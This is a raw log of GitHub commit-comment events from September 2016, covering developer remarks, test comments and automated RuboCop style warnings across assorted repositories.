{"id":"4544338514","type":"CommitCommentEvent","actor":{"login":"icehousesf"},"repo":{"name":"icehousesf/exchange-migration"},"payload":{"comment":{"id":18974166,"position":null,"line":null,"path":null,"commit_id":"4bcc2c5df90652871c6588de1999e5ba718aa78d","created_at":"2016-09-10T16:46:08Z","updated_at":"2016-09-10T16:46:08Z","body":"Create index.html"}},"created_at":"2016-09-10T16:46:08Z"}
{"id":"4544339785","type":"CommitCommentEvent","actor":{"login":"LinBoYuanGitHub"},"repo":{"name":"footyapps27/prms"},"payload":{"comment":{"id":18974169,"position":null,"line":null,"path":null,"commit_id":"fd9482a14988b0d382e1d0c178958dfa1b0d0917","created_at":"2016-09-10T16:47:09Z","updated_at":"2016-09-10T16:47:09Z","body":"commit part of the maintain schedule"}},"created_at":"2016-09-10T16:47:09Z"}
{"id":"4544340083","type":"CommitCommentEvent","actor":{"login":"Nyro46"},"repo":{"name":"ZoomTen/splash-rx"},"payload":{"comment":{"id":18974171,"position":null,"line":null,"path":null,"commit_id":"ec29a78fba5d1a0631c1a76fe4164d7974905382","created_at":"2016-09-10T16:47:21Z","updated_at":"2016-09-10T16:47:21Z","body":"I play Pokémon Go everyday, I play Pokémon Go!"}},"created_at":"2016-09-10T16:47:21Z"}
{"id":"4544341519","type":"CommitCommentEvent","actor":{"login":"baoliangquan"},"repo":{"name":"baoliangquan/xuexi"},"payload":{"comment":{"id":18974174,"position":null,"line":null,"path":null,"commit_id":"d1562eae54d183fbad58d1a73de5d5b1937e3f48","created_at":"2016-09-10T16:48:25Z","updated_at":"2016-09-10T16:48:25Z","body":"ttt"}},"created_at":"2016-09-10T16:48:25Z"}
{"id":"4544341539","type":"CommitCommentEvent","actor":{"login":"taylor1791"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18974175,"position":19,"line":88,"path":"app.js","commit_id":"1a1f64fe951442b072694954cff1d318cc254181","created_at":"2016-09-10T16:48:26Z","updated_at":"2016-09-10T16:48:26Z","body":"Thank you. I appreciate you taking the time and letting me know. "}},"created_at":"2016-09-10T16:48:26Z"}
{"id":"4544341747","type":"CommitCommentEvent","actor":{"login":"baoliangquan"},"repo":{"name":"baoliangquan/xuexi"},"payload":{"comment":{"id":18974176,"position":1,"line":1,"path":"serviceFile.txt","commit_id":"d1562eae54d183fbad58d1a73de5d5b1937e3f48","created_at":"2016-09-10T16:48:34Z","updated_at":"2016-09-10T16:48:34Z","body":"t"}},"created_at":"2016-09-10T16:48:34Z"}
{"id":"4544342244","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18974177,"position":null,"line":null,"path":null,"commit_id":"2fc66fddf38f6c8c8efa263c4a1e4fdd45bc3564","created_at":"2016-09-10T16:48:58Z","updated_at":"2016-09-10T16:48:58Z","body":"@ekiwi See this alternative binary implementation of error with stringify.\r\nI'm using the linker to get unique module ids, otherwise we'd have to manually assign module IDs, and that will be just a lot of pain.\r\n\r\nUsing strings is _a lot_ easier and consumes less memory."}},"created_at":"2016-09-10T16:48:58Z"}
{"id":"4544344643","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18974181,"position":null,"line":null,"path":null,"commit_id":"2fc66fddf38f6c8c8efa263c4a1e4fdd45bc3564","created_at":"2016-09-10T16:50:45Z","updated_at":"2016-09-10T16:50:45Z","body":"Besides, the stringify functions won't be able to be linked out this way at all. All strings for all errors are included always.\r\nHowever, if the compiler can deduct that an assert is always true, then it can remove it completely, including the failure id string."}},"created_at":"2016-09-10T16:50:45Z"}
{"id":"4544344700","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974182,"position":null,"line":null,"path":null,"commit_id":"2008d5a49fed6728d5125b40c3a170fc88433353","created_at":"2016-09-10T16:50:48Z","updated_at":"2016-09-10T16:50:48Z","body":"test"}},"created_at":"2016-09-10T16:50:48Z"}
{"id":"4544344927","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974183,"position":null,"line":null,"path":null,"commit_id":"2008d5a49fed6728d5125b40c3a170fc88433353","created_at":"2016-09-10T16:50:58Z","updated_at":"2016-09-10T16:50:58Z","body":"test"}},"created_at":"2016-09-10T16:50:58Z"}
{"id":"4544345959","type":"CommitCommentEvent","actor":{"login":"torusrxxx"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18974185,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T16:51:46Z","updated_at":"2016-09-10T16:51:46Z","body":"We could set a small memory breakpoint at a conditional breakpoint at\nfree() to cover the freed memory...\n"}},"created_at":"2016-09-10T16:51:46Z"}
{"id":"4544347216","type":"CommitCommentEvent","actor":{"login":"khanfrd"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18974190,"position":null,"line":null,"path":null,"commit_id":"4dd886eb6ea57a51f5cad2fbf5ebc2f2a74e20ea","created_at":"2016-09-10T16:52:38Z","updated_at":"2016-09-10T16:52:38Z","body":"@flar2 may i know why did you disable Hall driver by xiaomi and instated used caf one?"}},"created_at":"2016-09-10T16:52:38Z"}
{"id":"4544351385","type":"CommitCommentEvent","actor":{"login":"vovkasm"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":18974194,"position":null,"line":null,"path":null,"commit_id":"d6ec93d5f3cc37aaffe5e81e7e35920bab69e2a0","created_at":"2016-09-10T16:55:43Z","updated_at":"2016-09-10T16:55:43Z","body":"Ok, will do the same then ;-)\r\nAn I'am interested in a tool, that allows easy add test cases!"}},"created_at":"2016-09-10T16:55:43Z"}
{"id":"4544351438","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18974195,"position":12,"line":10,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-10T16:55:47Z","updated_at":"2016-09-10T16:55:47Z","body":"Could this be made to respect `editor.autoClosingBrackets` at least? Or any other option because I hate auto-closing stuff..."}},"created_at":"2016-09-10T16:55:47Z"}
{"id":"4544352174","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974196,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T16:56:19Z","updated_at":"2016-09-10T16:56:19Z","body":"test"}},"created_at":"2016-09-10T16:56:19Z"}
{"id":"4544352257","type":"CommitCommentEvent","actor":{"login":"ethanbonin"},"repo":{"name":"darylmillard/PleaseEdit"},"payload":{"comment":{"id":18974198,"position":null,"line":null,"path":null,"commit_id":"70b2c73b2a1fef2dc1e73e493356e247afa23f96","created_at":"2016-09-10T16:56:23Z","updated_at":"2016-09-10T16:56:23Z","body":"I see it. Great job!"}},"created_at":"2016-09-10T16:56:23Z"}
{"id":"4544353220","type":"CommitCommentEvent","actor":{"login":"salkinium"},"repo":{"name":"salkinium/xpcc"},"payload":{"comment":{"id":18974199,"position":null,"line":null,"path":null,"commit_id":"2fc66fddf38f6c8c8efa263c4a1e4fdd45bc3564","created_at":"2016-09-10T16:57:07Z","updated_at":"2016-09-10T16:57:07Z","body":"I'm not going to continue investigating this option further since it's obviously bullshit. But it's a nice idea to dynamically add stringify functions for all sorts of things in modular way.\r\n\r\nBut I think using strings for asserts is the most compact way of encoding error information, and the implementation is a lot easier. I will, however, move the string memory to Flash for AVRs, and the error handlers will just have to deal with that.\r\nThe error handlers are by definition application specific, so I don't believe that's an issue."}},"created_at":"2016-09-10T16:57:07Z"}
{"id":"4544353519","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974200,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T16:57:18Z","updated_at":"2016-09-10T16:57:18Z","body":"test2"}},"created_at":"2016-09-10T16:57:18Z"}
{"id":"4544354447","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18974203,"position":null,"line":null,"path":null,"commit_id":"c8e920787989e63874a8206a26f180fcf3e5e381","created_at":"2016-09-10T16:58:01Z","updated_at":"2016-09-10T16:58:01Z","body":"it wouldn't get used anyways, isreg is only used if _Is_ > 0, but it is set when that happens."}},"created_at":"2016-09-10T16:58:01Z"}
{"id":"4544354846","type":"CommitCommentEvent","actor":{"login":"nerogit"},"repo":{"name":"Leehyunhoo/TIL"},"payload":{"comment":{"id":18974204,"position":null,"line":null,"path":null,"commit_id":"50bbf716b7fa3bbc8b9be6b390a074ead41529d4","created_at":"2016-09-10T16:58:19Z","updated_at":"2016-09-10T16:58:19Z","body":"ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ이거 커엽.."}},"created_at":"2016-09-10T16:58:19Z"}
{"id":"4544355408","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974206,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T16:58:45Z","updated_at":"2016-09-10T16:58:45Z","body":"test3"}},"created_at":"2016-09-10T16:58:45Z"}
{"id":"4544356847","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974207,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T16:59:52Z","updated_at":"2016-09-10T16:59:52Z","body":"test4\r\n"}},"created_at":"2016-09-10T16:59:52Z"}
{"id":"4544359170","type":"CommitCommentEvent","actor":{"login":"sriharshachilakapati"},"repo":{"name":"LWJGL/lwjgl3"},"payload":{"comment":{"id":18974209,"position":null,"line":null,"path":null,"commit_id":"8622bcc8797ec7e5b01fcab94465ad86e8f9871d","created_at":"2016-09-10T17:01:14Z","updated_at":"2016-09-10T17:01:14Z","body":"Very interesting, does this resolve the issue of first thread on macOS? I assume you are creating a frame using the GLFW window's handle."}},"created_at":"2016-09-10T17:01:14Z"}
{"id":"4544359571","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974212,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:01:30Z","updated_at":"2016-09-10T17:01:30Z","body":"test5"}},"created_at":"2016-09-10T17:01:30Z"}
{"id":"4544361169","type":"CommitCommentEvent","actor":{"login":"as59203"},"repo":{"name":"as59203/Discord-NameFilter"},"payload":{"comment":{"id":18974214,"position":7,"line":40,"path":"bot.py","commit_id":"57daba0c4bf0b5378e361685fc952381ff046d5d","created_at":"2016-09-10T17:02:29Z","updated_at":"2016-09-10T17:02:29Z","body":"#interroc#"}},"created_at":"2016-09-10T17:02:29Z"}
{"id":"4544361319","type":"CommitCommentEvent","actor":{"login":"NohemitaLazo"},"repo":{"name":"npm/npm-expansions"},"payload":{"comment":{"id":18974215,"position":7,"line":16,"path":"expansions.txt","commit_id":"cae1a6b14fb1953ee4a09b6d3f7d260f9de2d2d4","created_at":"2016-09-10T17:02:33Z","updated_at":"2016-09-10T17:02:33Z","body":"National Programming Morning"}},"created_at":"2016-09-10T17:02:33Z"}
{"id":"4544363502","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974217,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:03:43Z","updated_at":"2016-09-10T17:03:43Z","body":"test6"}},"created_at":"2016-09-10T17:03:43Z"}
{"id":"4544363550","type":"CommitCommentEvent","actor":{"login":"RyTekk"},"repo":{"name":"franciscofranco/angler"},"payload":{"comment":{"id":18974218,"position":204,"line":514,"path":"drivers/devfreq/governor_msm_adreno_tz.c","commit_id":"bbc20e39f3125d301f3ca473eb701dfe5998cddb","created_at":"2016-09-10T17:03:45Z","updated_at":"2016-09-10T17:03:45Z","body":"I wonder if it's normal since I see a missing \"break\" (?)"}},"created_at":"2016-09-10T17:03:45Z"}
{"id":"4544364564","type":"CommitCommentEvent","actor":{"login":"HanBC"},"repo":{"name":"HanBC/hello-word"},"payload":{"comment":{"id":18974219,"position":null,"line":null,"path":null,"commit_id":"2008793544eb11e7df2181464f7145be37131be0","created_at":"2016-09-10T17:04:26Z","updated_at":"2016-09-10T17:04:26Z","body":"323131321"}},"created_at":"2016-09-10T17:04:26Z"}
{"id":"4544365861","type":"CommitCommentEvent","actor":{"login":"alexozer"},"repo":{"name":"alexozer/dotfiles"},"payload":{"comment":{"id":18974220,"position":7,"line":7,"path":"applications/.local/share/applications/chrome-hmjkmjkepdijhoojdojkdfohbdgmmhki-Default.desktop","commit_id":"3aa80614df739f493234b51e8f60275d2860403d","created_at":"2016-09-10T17:05:16Z","updated_at":"2016-09-10T17:05:16Z","body":"I don't really know either"}},"created_at":"2016-09-10T17:05:16Z"}
{"id":"4544369808","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974221,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:07:58Z","updated_at":"2016-09-10T17:07:58Z","body":"test7"}},"created_at":"2016-09-10T17:07:58Z"}
{"id":"4544370244","type":"CommitCommentEvent","actor":{"login":"marcomarotta"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18974223,"position":null,"line":null,"path":null,"commit_id":"f497dfa1d1e8581ddac83986de9a55d88d0d2c93","created_at":"2016-09-10T17:08:15Z","updated_at":"2016-09-10T17:08:15Z","body":"i just cant whitelist localhost. connection refused from 127.0.0.1:3000.\r\ndidnt touch .save file so there is localhost entry for whitelisting api.\r\nmy .save file:\r\n{\"isFirstRun\":false,\"allowedApiHosts\":[\"localhost\",\"127.0.0.1\"],\"loginDetails\":{\"username\":\"root\",\"password\":\"1337\"}}"}},"created_at":"2016-09-10T17:08:15Z"}
{"id":"4544372204","type":"CommitCommentEvent","actor":{"login":"thdeva"},"repo":{"name":"thdeva/thangaraj"},"payload":{"comment":{"id":18974227,"position":null,"line":null,"path":null,"commit_id":"eb269f920cc6ab1a2948477dc6977cd0455296a7","created_at":"2016-09-10T17:09:27Z","updated_at":"2016-09-10T17:09:27Z","body":"change the code is correct"}},"created_at":"2016-09-10T17:09:27Z"}
{"id":"4544372431","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974228,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:09:36Z","updated_at":"2016-09-10T17:09:36Z","body":"test8"}},"created_at":"2016-09-10T17:09:36Z"}
{"id":"4544373139","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974231,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:10:06Z","updated_at":"2016-09-10T17:10:06Z","body":"test9"}},"created_at":"2016-09-10T17:10:06Z"}
{"id":"4544375402","type":"CommitCommentEvent","actor":{"login":"nesyouu"},"repo":{"name":"davecromberge/wordnet"},"payload":{"comment":{"id":18974235,"position":null,"line":null,"path":null,"commit_id":"f3e01a9f765dcf87d6917ada8506496121c53efe","created_at":"2016-09-10T17:11:39Z","updated_at":"2016-09-10T17:11:39Z","body":"hi;\r\n\r\nI'm trying to write Lesk algorithme for desambiguisation , \r\n\r\nI found difficulty in writing it (didn't understand how to rujn the part3) , can you help me please it's for my memoir end of study. \r\nThank you (please help)."}},"created_at":"2016-09-10T17:11:39Z"}
{"id":"4544376805","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18974236,"position":58,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/core/InlinedCoreMethodNode.java","commit_id":"b904bda76966fe839fe899f23320d7a75e02c5e2","created_at":"2016-09-10T17:12:26Z","updated_at":"2016-09-10T17:12:26Z","body":"I was hoping to do something with no lookup somehow to improve startup performance. Maybe have a specific flag to say if `Fixnum#+` has been redefined, rather than checking if the method is what we expect when we look up."}},"created_at":"2016-09-10T17:12:26Z"}
{"id":"4544379078","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974242,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:13:52Z","updated_at":"2016-09-10T17:13:52Z","body":"test10"}},"created_at":"2016-09-10T17:13:52Z"}
{"id":"4544379103","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18974243,"position":null,"line":null,"path":null,"commit_id":"b904bda76966fe839fe899f23320d7a75e02c5e2","created_at":"2016-09-10T17:13:53Z","updated_at":"2016-09-10T17:13:53Z","body":"Looks good. What do you think we should do next? Try to measure the impact? Profile and find out what methods it's worth doing this for? Could be automate it somehow?"}},"created_at":"2016-09-10T17:13:53Z"}
{"id":"4544379835","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974245,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:14:22Z","updated_at":"2016-09-10T17:14:22Z","body":"test11"}},"created_at":"2016-09-10T17:14:22Z"}
{"id":"4544379974","type":"CommitCommentEvent","actor":{"login":"catdad"},"repo":{"name":"catdad/shellton"},"payload":{"comment":{"id":18974246,"position":null,"line":null,"path":null,"commit_id":"4fc67fda9ed3d1716293cd95652b146d783f3b69","created_at":"2016-09-10T17:14:28Z","updated_at":"2016-09-10T17:14:28Z","body":"#10 "}},"created_at":"2016-09-10T17:14:28Z"}
{"id":"4544380122","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974247,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:14:34Z","updated_at":"2016-09-10T17:14:34Z","body":"test12"}},"created_at":"2016-09-10T17:14:34Z"}
{"id":"4544381259","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974251,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:15:19Z","updated_at":"2016-09-10T17:15:19Z","body":"test13"}},"created_at":"2016-09-10T17:15:19Z"}
{"id":"4544382307","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974255,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:15:54Z","updated_at":"2016-09-10T17:15:54Z","body":"test14"}},"created_at":"2016-09-10T17:15:54Z"}
{"id":"4544383415","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974258,"position":null,"line":null,"path":null,"commit_id":"a0aadb0f932c9a2c24a36825b7b805495746581f","created_at":"2016-09-10T17:16:43Z","updated_at":"2016-09-10T17:16:43Z","body":"test15"}},"created_at":"2016-09-10T17:16:43Z"}
{"id":"4544385184","type":"CommitCommentEvent","actor":{"login":"lguadagna"},"repo":{"name":"c-hamilton/sf_treasure_hunt"},"payload":{"comment":{"id":18974262,"position":null,"line":null,"path":null,"commit_id":"f8feafca9c66d7676264a7cb61cb1517fd4225ba","created_at":"2016-09-10T17:17:59Z","updated_at":"2016-09-10T17:17:59Z","body":"A treasure hunt around the beautiful city of San Francisco "}},"created_at":"2016-09-10T17:17:59Z"}
{"id":"4544385195","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18974264,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-10T17:17:59Z","updated_at":"2016-09-10T17:17:59Z","body":"Let's add SandPox's CM 12.1 ROM network choice string behavior on your CM 13 ROM (example is shown in this picture):\r\n[Imgur](http://i.imgur.com/Ved8AUd.jpg)"}},"created_at":"2016-09-10T17:17:59Z"}
{"id":"4544389517","type":"CommitCommentEvent","actor":{"login":"xiaoxiao910227"},"repo":{"name":"Innersource001/RepoTest001"},"payload":{"comment":{"id":18974271,"position":null,"line":null,"path":null,"commit_id":"c5aa81b53a7f301a51ffaa375ed82101462ca081","created_at":"2016-09-10T17:20:44Z","updated_at":"2016-09-10T17:20:44Z","body":"第一个comment"}},"created_at":"2016-09-10T17:20:44Z"}
{"id":"4544390275","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974273,"position":null,"line":26,"path":"helper.rb:26:81: C: Line is too long. [96/80]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:17Z","updated_at":"2016-09-10T17:21:17Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:21:17Z"}
{"id":"4544390332","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974274,"position":null,"line":27,"path":"helper.rb:27:22: C: Use the new Ruby 1.9 hash syntax.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:20Z","updated_at":"2016-09-10T17:21:20Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:21:20Z"}
{"id":"4544390420","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974275,"position":null,"line":28,"path":"helper.rb:28:15: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:23Z","updated_at":"2016-09-10T17:21:23Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:21:23Z"}
{"id":"4544390481","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974276,"position":null,"line":32,"path":"helper.rb:32:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:26Z","updated_at":"2016-09-10T17:21:26Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:21:26Z"}
{"id":"4544390569","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974277,"position":null,"line":32,"path":"helper.rb:32:24: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:28Z","updated_at":"2016-09-10T17:21:28Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:21:28Z"}
{"id":"4544390617","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974278,"position":null,"line":33,"path":"helper.rb:33:28: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:30Z","updated_at":"2016-09-10T17:21:30Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:21:30Z"}
{"id":"4544390660","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974280,"position":null,"line":35,"path":"helper.rb:35:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:32Z","updated_at":"2016-09-10T17:21:32Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:21:32Z"}
{"id":"4544390704","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974281,"position":null,"line":35,"path":"helper.rb:35:23: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:34Z","updated_at":"2016-09-10T17:21:34Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:21:34Z"}
{"id":"4544390752","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974282,"position":null,"line":38,"path":"helper.rb:38:7: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:35Z","updated_at":"2016-09-10T17:21:35Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:21:35Z"}
{"id":"4544390786","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974283,"position":null,"line":38,"path":"helper.rb:38:25: C: Do not use then for multi-line if.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:37Z","updated_at":"2016-09-10T17:21:37Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:21:37Z"}
{"id":"4544390829","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974284,"position":null,"line":39,"path":"helper.rb:39:29: C: Do not use semicolons to terminate expressions.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:39Z","updated_at":"2016-09-10T17:21:39Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:21:39Z"}
{"id":"4544390869","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974285,"position":null,"line":44,"path":"helper.rb:44:14: C: Redundant self detected.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:41Z","updated_at":"2016-09-10T17:21:41Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:21:41Z"}
{"id":"4544390948","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974286,"position":null,"line":50,"path":"helper.rb:50:3: C: Assignment Branch Condition size for rubocop is too high. [16.76/15]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:44Z","updated_at":"2016-09-10T17:21:44Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T17:21:44Z"}
{"id":"4544391016","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974287,"position":null,"line":50,"path":"helper.rb:50:3: C: Method has too many lines. [13/10]","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:47Z","updated_at":"2016-09-10T17:21:47Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T17:21:47Z"}
{"id":"4544391100","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974288,"position":null,"line":58,"path":"helper.rb:58:23: W: Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:50Z","updated_at":"2016-09-10T17:21:50Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:21:50Z"}
{"id":"4544391115","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974289,"position":null,"line":58,"path":"helper.rb:58:28: W: Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used.","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:21:52Z","updated_at":"2016-09-10T17:21:52Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:21:52Z"}
